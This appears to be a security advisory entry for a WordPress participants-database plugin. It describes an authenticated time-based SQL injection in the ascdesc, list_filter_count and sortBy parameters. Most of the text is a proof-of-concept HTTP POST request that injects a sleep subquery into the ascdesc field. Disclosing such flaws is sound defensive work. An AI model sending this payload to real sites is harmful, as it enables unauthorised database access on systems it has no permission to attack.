Authenticated time-based SQL injection via the ascdesc, list_filter_count, and sortBy parameters.
Form the original advisory (see references):
POST /wp-admin/admin.php?page=participants-database HTTP/1.1
Host: *redacted....cause*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /wp-admin/admin.php?page=participants-database
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
Connection: close
Cookie: *cookies were here*
Upgrade-Insecure-Requests: 1
action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort